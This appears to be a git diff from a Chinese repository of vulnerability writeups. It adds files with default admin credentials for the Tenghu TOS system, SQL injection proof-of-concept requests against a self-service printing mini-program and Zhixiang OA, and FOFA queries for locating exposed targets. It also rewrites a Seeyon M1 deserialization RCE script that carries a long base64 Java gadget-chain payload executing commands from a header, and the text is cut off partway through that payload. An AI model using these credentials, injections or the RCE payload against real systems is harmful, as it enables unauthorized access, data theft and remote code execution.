@@ -0,0 +1,28 @@ +# 腾狐TOS行为管理系统存在弱口令漏洞 + +# 一、漏洞简介 +腾狐TOS行为管理系统存在弱口令漏洞,攻击者通过漏洞可以访问后台。 + +# 二、影响版本 ++ 腾狐TOS行为管理系统 + +# 三、资产测绘 +```plain +product="TENHOT-TOS-行为管理系统" +``` + +![1716365453445-63b439a5-1814-485f-a5d0-77289f7543c6.png](./img/Pzseu53sX_u69vr8/1716365453445-63b439a5-1814-485f-a5d0-77289f7543c6-843561.png) + +# 四、漏洞复现 +```plain +admin/admin +admin/admin123 +admin/123456 +``` + +![1716365300974-02b9823c-9edf-458e-b13d-cac6c4981075.png](./img/Pzseu53sX_u69vr8/1716365300974-02b9823c-9edf-458e-b13d-cac6c4981075-129835.png) + + + +> 更新: 2024-05-23 12:34:27 +> 原文: \ No newline at end of file diff --git a/自助打印微信小程序系统存在SQL注入漏洞.md b/自助打印微信小程序系统存在SQL注入漏洞.md new file mode 100644 index 0000000..6d28ff1 --- /dev/null +++ b/自助打印微信小程序系统存在SQL注入漏洞.md 
@@ -0,0 +1,37 @@ +# 自助打印微信小程序系统存在SQL注入漏洞 + +# 一、漏洞简介 +微数字化时代,打印服务的需求与日俱增。为了满足用户的便利需求,全新UI的自助打印系统/云打印小程序。全新UI设计:采用2024年最新的UI设计风格,界面简洁美观,用户体验极佳。云打印功能:支持用户通过小程序上传文件并进行云端打印,方便快捷。自助服务:用户可以自主选择打印参数,如打印份数、纸张类型等,实现真正的自助打印。多平台支持:源码支持微信小程序平台,方便用户在移动端进行操作。自助打印微信小程序系统存在SQL注入漏洞 + +# 二、影响版本 ++ 自助打印微信小程序系统 + +# 三、资产测绘 ++ fofa`"未登录" && "/admin/login/index.html"` ++ 特征 + +![1731770780231-233931af-9dae-4e66-b394-ceeaf5ac5ef0.png](./img/8MSyZ7Ia8bEhgqoI/1731770780231-233931af-9dae-4e66-b394-ceeaf5ac5ef0-467114.png) + +# 四、漏洞复现 +```java +POST /api/shop/nearByShop HTTP/1.1 +Host: +Content-Length: 104 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 +Cache-Control: max-age=0 +Content-Type: application/x-www-form-urlencoded +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 +Connection: close + +latitude=1&longitude=GTID_SUBSET(CONCAT((MID((IFNULL(CAST(CURRENT_USER() AS NCHAR),0x20)),1,190))),9392) +``` + +![1731770611972-822ff61c-09a2-48b2-8d1d-ed5a9ef930cd.png](./img/8MSyZ7Ia8bEhgqoI/1731770611972-822ff61c-09a2-48b2-8d1d-ed5a9ef930cd-909864.png) + + + +> 更新: 2024-11-27 10:00:05 +> 原文: \ No newline at end of file diff --git a/致翔OA系统接口open_juese存在SQL注入漏洞.md b/致翔OA系统接口open_juese存在SQL注入漏洞.md new file mode 100644 index 0000000..bfeafee --- /dev/null +++ b/致翔OA系统接口open_juese存在SQL注入漏洞.md 
@@ -0,0 +1,21 @@ +# 致翔OA系统接口open_juese存在SQL注入漏洞 +      致翔科技由广州致翔计算机科技有限公司和深圳分公司以及各地还有多家办事处组成,是以IT软件技术和管理不断创新为核心的客户需求导向型的高新技术和双软认证软件技术公司。致翔公司产品核心团队主要由具备多年实际企业管理与IT研发经验的专家级技术人才组成,研发与经营产品系列包括:集成多个行业应用功能的智慧协同平台,以及PC网站,手机APP、微信端的研发,可以为企事业单位,教育机构提供行业版本基础上按需定制的管理系统解决方案,目前已经成功应用在华为技术,铁通广东分公司,深圳海丽达幼儿园集团,广州卫监所,东莞南开学校,福州高级中学,长沙明达学校,上海中学东校,深圳凯卓立液压,中国路港集团,南方周末,广东煌上煌食品集团,广州天马摩托车集团公司,深圳电信实业,广东冠盛集团等超过1000家企事业单位,取得了显著的经济和管理效益。致翔OA open_juese存在SQL注入漏洞,未经授权的攻击者可通过该漏洞获取数据库敏感信息。 + +## fofa +```javascript +app="致翔软件-致翔OA" +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/1622799/1727332106847-17eef327-0131-44fc-8f66-5e218638666a.png) + +## poc +```java +GET /OpenWindows/open_juese.aspx?key=1&name=1&user=-1)+and+1=user--+&requeststr= HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Accept-Encoding: gzip, deflate, br, zstd +Accept: */* +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1731984893405-50be8661-ec4c-4cb0-b0ba-d33128548e03.png) + diff --git a/致远M1 usertokenservice 反序列化RCE漏洞.md b/致远M1 usertokenservice 反序列化RCE漏洞.md index dd39d9e..a3aca85 100644 --- a/致远M1 usertokenservice 反序列化RCE漏洞.md +++ b/致远M1 usertokenservice 反序列化RCE漏洞.md 
@@ -9,139 +9,43 @@ ``` POST /esn_mobile_pns/service/userTokenService HTTP/1.1 Host: {{Hostname}} -User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded cmd: @@@@@echo test -{{base64_decode("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 +{{base64_decode("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")}} ``` -## 批量检测脚本 +## 检测脚本 ```python -#!/usr/bin/env python - -# coding: utf-8 - - - -from pocsuite3.api import ( - - POCBase, Output, register_poc, logger, requests, OptDict, OptString, VUL_TYPE, - - REVERSE_PAYLOAD, POC_CATEGORY - -) - - - -class POC(POCBase): - - vulID = '1' - - version = '1' - - author = ['AuthorName'] - - vulDate = '2023-08-15' - - createDate = '2023-08-15' - - updateDate = '2023-08-15' - - references = [''] - - name = 'POC Name' - - appPowerLink = '' - - appName = 'Application Name' - - appVersion = '' - - vulType = VUL_TYPE.COMMAND_EXECUTION - - desc = ''' - - Description of the vulnerability. - - ''' - - samples = [''] - - install_requires = [''] - - pocDesc = ''' - - How to use the POC. 
- - ''' - - category = POC_CATEGORY.EXPLOITS.REMOTE - - - - def _verify(self): - - result = {} - - path = '/esn_mobile_pns/service/userTokenService' - - headers = { - - "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36", - - 'Connection': 'close', - - 'Content-Type': 'application/x-www-form-urlencoded', - - 'Accept-Encoding': 'gzip, deflate', - - 'cmd': '@@@@@echo Test', - - } - - data = '''{{base64dec(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 - -hvZHQAEkxqYXZhL2xhbmcvU3RyaW5nO1sAC2lNZXRob2RxAH4ACnhyACBqYXZheC5zY3JpcHQuU2NyaXB0RW5naW5lTWFuYWdlcgAAAAAAAAAACnQAGVJGOkpNb2RlbFJlc3VsdHQAG0xqYXZhL2xhbmcvU3RyaW5nO3hwc3EAfgAKc3IAJm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5rZXl2YWx1ZS5UaWVkTWFwRW50cnlUiqsSmzlVCAIAAUwAA21hcHQAQkxqYXZhL2xhbmcvT2JqZWN0O3hwc3IAFGphdmEubGFuZy5PYmplY3QAAAAAAAAAAAAAAHhwc3EAfgAJeHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNvbnN0YW50VHJhbnNmb3JtZXJUcmFuc2Zvcm1lcrN5Y+2Zs1QDAAB4cHcEAAAAAHg= - -''' - - response = requests.post(self.url + path, headers=headers, data=data) - - if response.status_code == 200 and "Test" in response.text: - - result['VerifyInfo'] = {} - - result['VerifyInfo']['URL'] = self.url + path - - result['VerifyInfo']['Payload'] = headers['cmd'] - - return self.parse_output(result) - - - - def _attack(self): - - return self._verify() - - - - def _parse_output(self, output): - - parsed_output = Output(self) - - if output: - - parsed_output.success(output) - - else: - - parsed_output.fail("Exploit failed. 
Target is not vulnerable.") - - return parsed_output - - - -register_poc(POC) +import requests +import urllib3 +import sys +import time +import json +import re +import urllib +import base64 + +urllib3.disable_warnings() + +def verify(site): + burp0_url = site + "/esn_mobile_pns/service/userTokenService" + headers = { + "Content-Type":"application/x-www-form-urlencoded", + "cmd":"@@@@@ver" + } + raw_data = base64.b64decode("rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI/QAAAAAAAAXNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHQAA2Zvb3NyACpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMubWFwLkxhenlNYXBu5ZSCnnkQlAMAAUwAB2ZhY3Rvcnl0ACxMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5DaGFpbmVkVHJhbnNmb3JtZXIwx5fsKHqXBAIAAVsADWlUcmFuc2Zvcm1lcnN0AC1bTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHVyAC1bTG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5UcmFuc2Zvcm1lcju9Virx2DQYmQIAAHhwAAAABHNyADtvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ29uc3RhbnRUcmFuc2Zvcm1lclh2kBFBArGUAgABTAAJaUNvbnN0YW50cQB+AAN4cHZyACBqYXZheC5zY3JpcHQuU2NyaXB0RW5naW5lTWFuYWdlcgAAAAAAAAAAAAAAeHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkludm9rZXJUcmFuc2Zvcm1lcofo/2t7fM44AgADWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7TAALaU1ldGhvZE5hbWV0ABJMamF2YS9sYW5nL1N0cmluZztbAAtpUGFyYW1UeXBlc3QAEltMamF2YS9sYW5nL0NsYXNzO3hwdXIAE1tMamF2YS5sYW5nLk9iamVjdDuQzlifEHMpbAIAAHhwAAAAAHQAC25ld0luc3RhbmNldXIAEltMamF2YS5sYW5nLkNsYXNzO6sW167LzVqZAgAAeHAAAAAAc3EAfgATdXEAfgAYAAAAAXQAAmpzdAAPZ2V0RW5naW5lQnlOYW1ldXEAfgAbAAAAAXZyABBqYXZhLmxhbmcuU3RyaW5noPCkOHo7s0ICAAB4cHNxAH4AE3VxAH4AGAAAAAF0LWx0cnkgewogIGxvYWQoIm5hc2hvcm46bW96aWxsYV9jb21wYXQuanMiKTsKfSBjYXRjaCAoZSkge30KZnVuY3Rpb24gZ2V0VW5zYWZlKCl7CiAgdmFyIHRoZVVuc2FmZU1ldGhvZCA9IGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJzdW4ubWlzYy5VbnNhZmUiKS5nZXREZWNsYXJlZEZpZWxkKCd0aGVVb
nNhZmUnKTsKICB0aGVVbnNhZmVNZXRob2Quc2V0QWNjZXNzaWJsZSh0cnVlKTsgCiAgcmV0dXJuIHRoZVVuc2FmZU1ldGhvZC5nZXQobnVsbCk7Cn0KZnVuY3Rpb24gcmVtb3ZlQ2xhc3NDYWNoZShjbGF6eil7CiAgdmFyIHVuc2FmZSA9IGdldFVuc2FmZSgpOwogIHZhciBjbGF6ekFub255bW91c0NsYXNzID0gdW5zYWZlLmRlZmluZUFub255bW91c0NsYXNzKGNsYXp6LGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJqYXZhLmxhbmcuQ2xhc3MiKS5nZXRSZXNvdXJjZUFzU3RyZWFtKCJDbGFzcy5jbGFzcyIpLnJlYWRBbGxCeXRlcygpLG51bGwpOwogIHZhciByZWZsZWN0aW9uRGF0YUZpZWxkID0gY2xhenpBbm9ueW1vdXNDbGFzcy5nZXREZWNsYXJlZEZpZWxkKCJyZWZsZWN0aW9uRGF0YSIpOwogIHVuc2FmZS5wdXRPYmplY3QoY2xhenosdW5zYWZlLm9iamVjdEZpZWxkT2Zmc2V0KHJlZmxlY3Rpb25EYXRhRmllbGQpLG51bGwpOwp9CmZ1bmN0aW9uIGJ5cGFzc1JlZmxlY3Rpb25GaWx0ZXIoKSB7CiAgdmFyIHJlZmxlY3Rpb25DbGFzczsKICB0cnkgewogICAgcmVmbGVjdGlvbkNsYXNzID0gamF2YS5sYW5nLkNsYXNzLmZvck5hbWUoImpkay5pbnRlcm5hbC5yZWZsZWN0LlJlZmxlY3Rpb24iKTsKICB9IGNhdGNoIChlcnJvcikgewogICAgcmVmbGVjdGlvbkNsYXNzID0gamF2YS5sYW5nLkNsYXNzLmZvck5hbWUoInN1bi5yZWZsZWN0LlJlZmxlY3Rpb24iKTsKICB9CiAgdmFyIHVuc2FmZSA9IGdldFVuc2FmZSgpOwogIHZhciBjbGFzc0J1ZmZlciA9IHJlZmxlY3Rpb25DbGFzcy5nZXRSZXNvdXJjZUFzU3RyZWFtKCJSZWZsZWN0aW9uLmNsYXNzIikucmVhZEFsbEJ5dGVzKCk7CiAgdmFyIHJlZmxlY3Rpb25Bbm9ueW1vdXNDbGFzcyA9IHVuc2FmZS5kZWZpbmVBbm9ueW1vdXNDbGFzcyhyZWZsZWN0aW9uQ2xhc3MsIGNsYXNzQnVmZmVyLCBudWxsKTsKICB2YXIgZmllbGRGaWx0ZXJNYXBGaWVsZCA9IHJlZmxlY3Rpb25Bbm9ueW1vdXNDbGFzcy5nZXREZWNsYXJlZEZpZWxkKCJmaWVsZEZpbHRlck1hcCIpOwogIHZhciBtZXRob2RGaWx0ZXJNYXBGaWVsZCA9IHJlZmxlY3Rpb25Bbm9ueW1vdXNDbGFzcy5nZXREZWNsYXJlZEZpZWxkKCJtZXRob2RGaWx0ZXJNYXAiKTsKICBpZiAoZmllbGRGaWx0ZXJNYXBGaWVsZC5nZXRUeXBlKCkuaXNBc3NpZ25hYmxlRnJvbShqYXZhLmxhbmcuQ2xhc3MuZm9yTmFtZSgiamF2YS51dGlsLkhhc2hNYXAiKSkpIHsKICAgIHVuc2FmZS5wdXRPYmplY3QocmVmbGVjdGlvbkNsYXNzLCB1bnNhZmUuc3RhdGljRmllbGRPZmZzZXQoZmllbGRGaWx0ZXJNYXBGaWVsZCksIGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJqYXZhLnV0aWwuSGFzaE1hcCIpLmdldENvbnN0cnVjdG9yKCkubmV3SW5zdGFuY2UoKSk7CiAgfQogIGlmIChtZXRob2RGaWx0ZXJNYXBGaWVsZC5nZXRUeXBlKCkuaXNBc3NpZ25hYmxlRnJvbShqYXZhLmxhbmcuQ2xhc3MuZm9yTmFtZSgiamF2YS51dGlsLkhhc2hNYXAiKSkpIHsKICAgIHVuc2FmZ
S5wdXRPYmplY3QocmVmbGVjdGlvbkNsYXNzLCB1bnNhZmUuc3RhdGljRmllbGRPZmZzZXQobWV0aG9kRmlsdGVyTWFwRmllbGQpLCBqYXZhLmxhbmcuQ2xhc3MuZm9yTmFtZSgiamF2YS51dGlsLkhhc2hNYXAiKS5nZXRDb25zdHJ1Y3RvcigpLm5ld0luc3RhbmNlKCkpOwogIH0KICByZW1vdmVDbGFzc0NhY2hlKGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJqYXZhLmxhbmcuQ2xhc3MiKSk7Cn0KZnVuY3Rpb24gc2V0QWNjZXNzaWJsZShhY2Nlc3NpYmxlT2JqZWN0KXsKICAgIHZhciB1bnNhZmUgPSBnZXRVbnNhZmUoKTsKICAgIHZhciBvdmVycmlkZUZpZWxkID0gamF2YS5sYW5nLkNsYXNzLmZvck5hbWUoImphdmEubGFuZy5yZWZsZWN0LkFjY2Vzc2libGVPYmplY3QiKS5nZXREZWNsYXJlZEZpZWxkKCJvdmVycmlkZSIpOwogICAgdmFyIG9mZnNldCA9IHVuc2FmZS5vYmplY3RGaWVsZE9mZnNldChvdmVycmlkZUZpZWxkKTsKICAgIHVuc2FmZS5wdXRCb29sZWFuKGFjY2Vzc2libGVPYmplY3QsIG9mZnNldCwgdHJ1ZSk7Cn0KZnVuY3Rpb24gZGVmaW5lQ2xhc3MoYnl0ZXMpewogIHZhciBjbHogPSBudWxsOwogIHZhciB2ZXJzaW9uID0gamF2YS5sYW5nLlN5c3RlbS5nZXRQcm9wZXJ0eSgiamF2YS52ZXJzaW9uIik7CiAgdmFyIHVuc2FmZSA9IGdldFVuc2FmZSgpCiAgdmFyIGNsYXNzTG9hZGVyID0gbmV3IGphdmEubmV0LlVSTENsYXNzTG9hZGVyKGphdmEubGFuZy5yZWZsZWN0LkFycmF5Lm5ld0luc3RhbmNlKGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJqYXZhLm5ldC5VUkwiKSwgMCkpOwogIHRyeXsKICAgIGlmICh2ZXJzaW9uLnNwbGl0KCIuIilbMF0gPj0gMTEpIHsKICAgICAgYnlwYXNzUmVmbGVjdGlvbkZpbHRlcigpOwogICAgZGVmaW5lQ2xhc3NNZXRob2QgPSBqYXZhLmxhbmcuQ2xhc3MuZm9yTmFtZSgiamF2YS5sYW5nLkNsYXNzTG9hZGVyIikuZ2V0RGVjbGFyZWRNZXRob2QoImRlZmluZUNsYXNzIiwgamF2YS5sYW5nLkNsYXNzLmZvck5hbWUoIltCIiksamF2YS5sYW5nLkludGVnZXIuVFlQRSwgamF2YS5sYW5nLkludGVnZXIuVFlQRSk7CiAgICBzZXRBY2Nlc3NpYmxlKGRlZmluZUNsYXNzTWV0aG9kKTsKICAgIC8vIOe7lei/hyBzZXRBY2Nlc3NpYmxlIAogICAgY2x6ID0gZGVmaW5lQ2xhc3NNZXRob2QuaW52b2tlKGNsYXNzTG9hZGVyLCBieXRlcywgMCwgYnl0ZXMubGVuZ3RoKTsKICAgIH1lbHNlewogICAgICB2YXIgcHJvdGVjdGlvbkRvbWFpbiA9IG5ldyBqYXZhLnNlY3VyaXR5LlByb3RlY3Rpb25Eb21haW4obmV3IGphdmEuc2VjdXJpdHkuQ29kZVNvdXJjZShudWxsLCBqYXZhLmxhbmcucmVmbGVjdC5BcnJheS5uZXdJbnN0YW5jZShqYXZhLmxhbmcuQ2xhc3MuZm9yTmFtZSgiamF2YS5zZWN1cml0eS5jZXJ0LkNlcnRpZmljYXRlIiksIDApKSwgbnVsbCwgY2xhc3NMb2FkZXIsIFtdKTsKICAgICAgY2x6ID0gdW5zYWZlLmRlZmluZUNsYXNzKG51bGwsIGJ5dGVzLCAwLCBieXRlcy5sZW5ndGgsIGNsYXNzTG9hZ
GVyLCBwcm90ZWN0aW9uRG9tYWluKTsKICAgIH0KICB9Y2F0Y2goZXJyb3IpewogICAgZXJyb3IucHJpbnRTdGFja1RyYWNlKCk7CiAgfWZpbmFsbHl7CiAgICByZXR1cm4gY2x6OwogIH0KfQpmdW5jdGlvbiBiYXNlNjREZWNvZGVUb0J5dGUoc3RyKSB7CiAgdmFyIGJ0OwogIHRyeSB7CiAgICBidCA9IGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJzdW4ubWlzYy5CQVNFNjREZWNvZGVyIikubmV3SW5zdGFuY2UoKS5kZWNvZGVCdWZmZXIoc3RyKTsKICB9IGNhdGNoIChlKSB7CiAgICBidCA9IGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJqYXZhLnV0aWwuQmFzZTY0IikubmV3SW5zdGFuY2UoKS5nZXREZWNvZGVyKCkuZGVjb2RlKHN0cik7CiAgfQogIHJldHVybiBidDsKfQp2YXIgY29kZT0ieXY2NnZnQUFBQzhCWndvQUlBQ1NCd0NUQndDVUNnQUNBSlVLQUFNQWxnb0FJZ0NYQ2dDWUFKa0tBSmdBbWdvQUlnQ2JDQUNjQ2dBZ0FKMEtBSjRBbndvQW5nQ2dCd0NoQ2dDWUFLSUlBSXdLQUNrQW93Z0FwQWdBcFFjQXBnZ0Fwd2dBcUFjQXFRb0FJQUNxQ0FDckNBQ3NCd0N0Q3dBYkFLNExBQnNBcndnQXNBZ0FzUWNBc2dvQUlBQ3pCd0MwQ2dDMUFMWUlBTGNKQUg0QXVBZ0F1UW9BZmdDNkNBQzdCd0M4Q2dCK0FMMEtBQ2tBdmdnQXZ3a0FMZ0RBQndEQkNnQXVBTUlJQU1NS0FINEF4QW9BSUFERkNBREdDUUIrQU1jSUFNZ0tBQ0FBeVFnQXlnY0F5d2dBekFnQXpRb0FtQURPQ2dEUEFNUUlBTkFLQUNrQTBRZ0EwZ29BS1FEVENBRFVDZ0FwQU5VS0FDa0ExZ2dBMXdvQUtRRFlDQURaQ2dBdUFOb0tBSDRBMndnQTNBb0FmZ0RkQ0FEZUNnRGZBT0FLQUNrQTRRZ0E0Z2dBNHdnQTVBY0E1UW9BVVFDWENnQlJBT1lJQU9jS0FGRUE2QWdBNlFnQTZnZ0E2d2dBN0FvQTdRRHVDZ0R0QU84SEFQQUtBUEVBOGdvQVhBRHpDQUQwQ2dCY0FQVUtBRndBOWdvQVhBRDNDZ0R4QVBnS0FQRUErUW9BT0FEb0NBRDZDZ0FwQUpZSUFQc0tBTzBBL0FjQS9Rb0FMZ0QrQ2dCcUFQOEtBR29BOGdvQThRRUFDZ0JxQVFBS0FHb0JBUW9CQWdFRENnRUNBUVFLQVFVQkJnb0JCUUVIQlFBQUFBQUFBQUF5Q2dDWUFRZ0tBUEVCQ1FvQWFnRUtDQUVMQ2dBNEFKVUlBUXdJQVEwSEFRNEJBQlpqYkdGemN5UnFZWFpoSkd4aGJtY2tVM1J5YVc1bkFRQVJUR3BoZG1FdmJHRnVaeTlEYkdGemN6c0JBQWxUZVc1MGFHVjBhV01CQUFkaGNuSmhlU1JDQVFBR1BHbHVhWFErQVFBREtDbFdBUUFFUTI5a1pRRUFEMHhwYm1WT2RXMWlaWEpVWVdKc1pRRUFDa1Y0WTJWd2RHbHZibk1CQUFsc2IyRmtRMnhoYzNNQkFDVW9UR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdLVXhxWVhaaEwyeGhibWN2UTJ4aGMzTTdBUUFIWlhobFkzVjBaUUVBSmloTWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzcFRHcGhkbUV2YkdGdVp5OVRkSEpwYm1jN0FRQUVaWGhsWXdFQUIzSmxkbVZ5YzJVQkFEa29UR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdUR3BoZG1FdmJHRnVaeTlKYm5SbFoyVnlPeWxNYW1GMllTOXNZVzVuTDFOMGNtbHVaenNCQUFaa
mJHRnpjeVFCQUFwVGIzVnlZMlZHYVd4bEFRQUhRVFF1YW1GMllRd0JEd0NKQVFBZ2FtRjJZUzlzWVc1bkwwTnNZWE56VG05MFJtOTFibVJGZUdObGNIUnBiMjRCQUI1cVlYWmhMMnhoYm1jdlRtOURiR0Z6YzBSbFprWnZkVzVrUlhKeWIzSU1BUkFCRVF3QWd3RVNEQUNEQUlRSEFSTU1BUlFCRlF3QkZnRVhEQUVZQVJrQkFBZDBhSEpsWVdSekRBRWFBUnNIQVJ3TUFSMEJIZ3dCSHdFZ0FRQVRXMHhxWVhaaEwyeGhibWN2VkdoeVpXRmtPd3dCSVFFUkRBRWlBU01CQUFSb2RIUndBUUFHZEdGeVoyVjBBUUFTYW1GMllTOXNZVzVuTDFKMWJtNWhZbXhsQVFBR2RHaHBjeVF3QVFBSGFHRnVaR3hsY2dFQUhtcGhkbUV2YkdGdVp5OU9iMU4xWTJoR2FXVnNaRVY0WTJWd2RHbHZiZ3dCSkFFWkFRQUdaMnh2WW1Gc0FRQUtjSEp2WTJWemMyOXljd0VBRG1waGRtRXZkWFJwYkM5TWFYTjBEQUVsQVNZTUFSOEJKd0VBQTNKbGNRRUFDMmRsZEZKbGMzQnZibk5sQVFBUGFtRjJZUzlzWVc1bkwwTnNZWE56REFFb0FTa0JBQkJxWVhaaEwyeGhibWN2VDJKcVpXTjBCd0VxREFFckFTd0JBQWxuWlhSSVpXRmtaWElNQUg4QWdBRUFFR3BoZG1FdWJHRnVaeTVUZEhKcGJtY01BSThBaVFFQUEyTnRaQUVBRUdwaGRtRXZiR0Z1Wnk5VGRISnBibWNNQUlvQWl3d0JMUUV1QVFBSmMyVjBVM1JoZEhWekRBRXZBSUFCQUJGcVlYWmhMMnhoYm1jdlNXNTBaV2RsY2d3QWd3RXdBUUFrYjNKbkxtRndZV05vWlM1MGIyMWpZWFF1ZFhScGJDNWlkV1l1UW5sMFpVTm9kVzVyREFDSUFJa01BVEVCTWdFQUNITmxkRUo1ZEdWekRBQ0NBSUFCQUFKYlFnd0JNd0VwQVFBSFpHOVhjbWwwWlFFQUUycGhkbUV2YkdGdVp5OUZlR05sY0hScGIyNEJBQk5xWVhaaExtNXBieTVDZVhSbFFuVm1abVZ5QVFBRWQzSmhjQXdCTkFFMUJ3RTJBUUFBREFFM0FUZ0JBQkJqYjIxdFlXNWtJRzV2ZENCdWRXeHNEQUU1QVJFQkFBVWpJeU1qSXd3Qk9nRTdEQUU4QVQwQkFBRTZEQUUrQVQ4QkFDSmpiMjF0WVc1a0lISmxkbVZ5YzJVZ2FHOXpkQ0JtYjNKdFlYUWdaWEp5YjNJaERBRkFBVUVNQUkwQWpnRUFCVUJBUUVCQURBQ01BSXNCQUFkdmN5NXVZVzFsQndGQ0RBRkRBSXNNQVVRQkVRRUFBM2RwYmdFQUJIQnBibWNCQUFJdGJnRUFGbXBoZG1FdmJHRnVaeTlUZEhKcGJtZENkV1ptWlhJTUFVVUJSZ0VBQlNBdGJpQTBEQUZIQVJFQkFBSXZZd0VBQlNBdGRDQTBBUUFDYzJnQkFBSXRZd2NCU0F3QlNRRktEQUNNQVVzQkFCRnFZWFpoTDNWMGFXd3ZVMk5oYm01bGNnY0JUQXdCVFFGT0RBQ0RBVThCQUFKY1lRd0JVQUZSREFGU0FWTU1BVlFCRVF3QlZRRk9EQUZXQUlRQkFBY3ZZbWx1TDNOb0FRQUhZMjFrTG1WNFpRd0FqQUZYQVFBUGFtRjJZUzl1WlhRdlUyOWphMlYwREFGWUFTWU1BSU1CV1F3QldnRmJEQUZjQVZNSEFWME1BVjRCSmd3Qlh3RW1Cd0ZnREFGaEFUQU1BV0lBaEF3Qll3RmtEQUZsQVNZTUFXWUFoQUVBSFhKbGRtVnljMlVnWlhobFkzVjBaU0JsY25KdmNpd2diWE5uSUMwK0FRQUJJUUVBRTNKbGRtVnljMlVnWlhob
FkzVjBaU0J2YXlFQkFBSkJOQUVBQjJadmNrNWhiV1VCQUFwblpYUk5aWE56WVdkbEFRQVVLQ2xNYW1GMllTOXNZVzVuTDFOMGNtbHVaenNCQUJVb1RHcGhkbUV2YkdGdVp5OVRkSEpwYm1jN0tWWUJBQkJxWVhaaEwyeGhibWN2VkdoeVpXRmtBUUFOWTNWeWNtVnVkRlJvY21WaFpBRUFGQ2dwVEdwaGRtRXZiR0Z1Wnk5VWFISmxZV1E3QVFBT1oyVjBWR2h5WldGa1IzSnZkWEFCQUJrb0tVeHFZWFpoTDJ4aGJtY3ZWR2h5WldGa1IzSnZkWEE3QVFBSVoyVjBRMnhoYzNNQkFCTW9LVXhxWVhaaEwyeGhibWN2UTJ4aGMzTTdBUUFRWjJWMFJHVmpiR0Z5WldSR2FXVnNaQUVBTFNoTWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzcFRHcGhkbUV2YkdGdVp5OXlaV1pzWldOMEwwWnBaV3hrT3dFQUYycGhkbUV2YkdGdVp5OXlaV1pzWldOMEwwWnBaV3hrQVFBTmMyVjBRV05qWlhOemFXSnNaUUVBQkNoYUtWWUJBQU5uWlhRQkFDWW9UR3BoZG1FdmJHRnVaeTlQWW1wbFkzUTdLVXhxWVhaaEwyeGhibWN2VDJKcVpXTjBPd0VBQjJkbGRFNWhiV1VCQUFoamIyNTBZV2x1Y3dFQUd5aE1hbUYyWVM5c1lXNW5MME5vWVhKVFpYRjFaVzVqWlRzcFdnRUFEV2RsZEZOMWNHVnlZMnhoYzNNQkFBUnphWHBsQVFBREtDbEpBUUFWS0VrcFRHcGhkbUV2YkdGdVp5OVBZbXBsWTNRN0FRQUpaMlYwVFdWMGFHOWtBUUJBS0V4cVlYWmhMMnhoYm1jdlUzUnlhVzVuTzF0TWFtRjJZUzlzWVc1bkwwTnNZWE56T3lsTWFtRjJZUzlzWVc1bkwzSmxabXhsWTNRdlRXVjBhRzlrT3dFQUdHcGhkbUV2YkdGdVp5OXlaV1pzWldOMEwwMWxkR2h2WkFFQUJtbHVkbTlyWlFFQU9TaE1hbUYyWVM5c1lXNW5MMDlpYW1WamREdGJUR3BoZG1FdmJHRnVaeTlQWW1wbFkzUTdLVXhxWVhaaEwyeGhibWN2VDJKcVpXTjBPd0VBQ0dkbGRFSjVkR1Z6QVFBRUtDbGJRZ0VBQkZSWlVFVUJBQVFvU1NsV0FRQUxibVYzU1c1emRHRnVZMlVCQUJRb0tVeHFZWFpoTDJ4aGJtY3ZUMkpxWldOME93RUFFV2RsZEVSbFkyeGhjbVZrVFdWMGFHOWtBUUFWWjJWMFEyOXVkR1Y0ZEVOc1lYTnpURzloWkdWeUFRQVpLQ2xNYW1GMllTOXNZVzVuTDBOc1lYTnpURzloWkdWeU93RUFGV3BoZG1FdmJHRnVaeTlEYkdGemMweHZZV1JsY2dFQUJtVnhkV0ZzY3dFQUZTaE1hbUYyWVM5c1lXNW5MMDlpY